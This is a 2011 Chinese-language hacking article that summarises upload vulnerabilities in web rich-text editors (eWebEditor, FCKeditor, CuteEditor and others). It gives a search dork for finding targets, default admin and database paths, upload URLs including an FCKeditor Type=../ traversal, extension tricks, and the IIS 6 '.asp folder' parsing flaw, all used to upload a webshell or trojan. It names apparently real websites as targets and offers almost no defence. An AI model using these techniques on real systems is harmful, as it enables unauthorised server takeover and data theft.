軟件首頁(yè) |  文章首頁(yè)
最新更新 軟件分類 設(shè)為首頁(yè) 加入收藏 聯(lián)系我們
當(dāng)前位置:首頁(yè)文章首頁(yè) IT學(xué)院 IT技術(shù)

2011編輯器漏洞總結(jié)

作者:  來源:  發(fā)布時(shí)間:2011-3-22 16:17:58  點(diǎn)擊:

如何搜索編輯器漏洞?
site:editor inurl:asp?id inurl:ewebeditornet
比如常見的編輯器漏洞有:
ewebeditor
ewebeditornet
fckeditor
editor
southidceditor
SouthidcEditor
bigcneditor
CuteEditor
一:ewebeditor為例
1:默認(rèn)下載下來的后臺(tái):
http://www.test.com/ewebeditor/admin_login.asp
后臺(tái)如果能進(jìn)入:
可點(diǎn)擊樣式管理:
standard 拷貝一份(直接修改改不了)
在拷貝的一份里加入圖片類型( asa aaspsp ) 然后點(diǎn)預(yù)覽
在編輯器里點(diǎn)設(shè)計(jì) 然后直接上傳asa大馬.
上傳后 在代碼里可以看到馬的位置!
(原理:因?yàn)樵趇is里 網(wǎng)站的屬性里 應(yīng)用程序配置一項(xiàng) asa擴(kuò)展名還是用asp.dll來解析的,asp也是 還有 cer cdx )
在cer cdx asa的被刪掉 那么馬兒就找不到 映射不過去.
可以在拷貝過后的樣式 圖片類型里加入 aaspsp 然后在上傳 直接就可以上傳asp文件
2:下載默認(rèn)數(shù)據(jù)庫(kù)
www.test.com/ewebeditor/db/ewebeditor.mdb
然后分析數(shù)據(jù)庫(kù)
webeditor_system(1) 就可以看到用戶名和密碼 如果破解不出來
可以在webeditor_style(14 樣式表里
主要看允許上傳文件的擴(kuò)展名(s-fileext s_ingeext)
看到一個(gè)小黑客曾經(jīng)搞過 多了asa aaspsp
可以用他來利用!(后臺(tái)找不到的情況下也可以用此方法)
可以構(gòu)造語句:
比如 ID=46 s-name =standard1
構(gòu)造 代碼: ewebeditor.asp?id=content&style=standard
ID和和樣式名改過后
ewebeditor.asp?id=46&style=standard1
然后就是進(jìn)入編輯器 上傳asa 或者asp的 得到webshell
二:ewebeditornet 漏洞利用
默認(rèn)上傳地址:
www.test.com/ewebeditornet/upload.aspx
可以直接上傳一個(gè)cer的木馬
在無法上傳的情況下
可以地址欄構(gòu)造以下代碼: javascript:lbtnUpload.click();
然后查看源代碼:
找到uploadsave 找到地址
默認(rèn)傳到uploadfile這個(gè)文件夾里
(漏洞修補(bǔ): 可以在iss里直接把upload文件夾的執(zhí)行權(quán)限選擇無. )
三:fckeditor 漏洞利用
http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
就把文件名字段改成NEWfile 選擇文件名可定義
上傳過后在/userfiles/image/找文件
四:southidceditor
http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb
http://www.xhkjit.com/admin/southidceditor/popup.asp
http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp
五:bigcneditor
這個(gè)頁(yè)不多說了
原理都差不多!
防范方法很簡(jiǎn)單就不多講了,
FCKeditor上傳漏洞,
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打開這個(gè)地址就可以上傳任何類型的文件了,馬兒上傳到的位置是:
http://www.xxx.com/UserFiles/all/1.asa
"Type=all" 這個(gè)變量是自己定義的,在這里創(chuàng)建了all這個(gè)目錄,而且新的目錄沒有上傳文件格式的限制.
比如輸入:
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp
所傳的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了
而 如果這樣輸入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以傳到網(wǎng)站的根目錄下,網(wǎng)站支持什么腳本,傳什么腳本的馬就可以了.
所傳的文件就到了網(wǎng)站根目錄下了
http://www.borse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781
六:CuteEditor編輯器通殺漏洞
CuteEditor編輯器是.NET下最常用的一個(gè)編輯器..
十分的強(qiáng)大..也許是因?yàn)樗珡?qiáng)了 HEHE ..
我們隨便找到一個(gè)裝有此編輯器的網(wǎng)站 點(diǎn)擊插入圖片 FLASH 影音文件 什么的都可以出來一個(gè)對(duì)話框.
在這個(gè)對(duì)話框里可以游覽用戶所上傳的數(shù)據(jù)還有目錄..郁悶的是居然可以新建..移動(dòng)..修改..
在官網(wǎng)上甚至連刪除都弄出來了..呵呵.. 我們這次主要是利用2003服務(wù)器的特性來進(jìn)行利用..
大家都知道在2003的IIS環(huán)境下 如果你建一個(gè) XXX.asp 文件夾的話 里面不管放什么其他類型的文件
在IIS里都會(huì)通過文件夾名的類型來解析 也就是說你傳一個(gè)JPG的東西到 XXX.ASP下也會(huì)以ASP腳本
來進(jìn)行解析..我們這里就利用他這一特性...首先我們隨便找一個(gè)編輯器 然后選擇插入圖片吧(如圖1)..插入其他的
東西都行..只要能新建文件目錄..或者可以移動(dòng)目錄..
看這里就有新建文件夾等等一些操作的按鈕我們新建一個(gè)..如果新建不能用可以試試移動(dòng)文件夾把以有的文件夾名改成 XXX.asp形式..
好了.我們新建一個(gè) www.asp 文件夾.
確定..我們的文件夾就建好了..然后點(diǎn)擊進(jìn)入該文件夾 (
然后到了最關(guān)鍵的...我們上傳文件..
用插入圖片是上傳不了的..他會(huì)檢測(cè)是不是正常的圖片..
可以試試 插入 FLASH
或者插入 視頻 音樂文件..我們這里就插入視頻.. 然后直接把 我們要傳上去的馬后綴改為 .avi形式
然后進(jìn)入我們剛才新建的那個(gè)目錄 然后上傳 .. 文件就上去了

相關(guān)軟件

相關(guān)文章

文章評(píng)論

本類推薦文章

關(guān)于本站 | 網(wǎng)站幫助 | 廣告合作 | 下載聲明 | 友情連接 | 網(wǎng)站地圖
Copyright © 20098-2010 uzzf下載站. All Rights Reserved .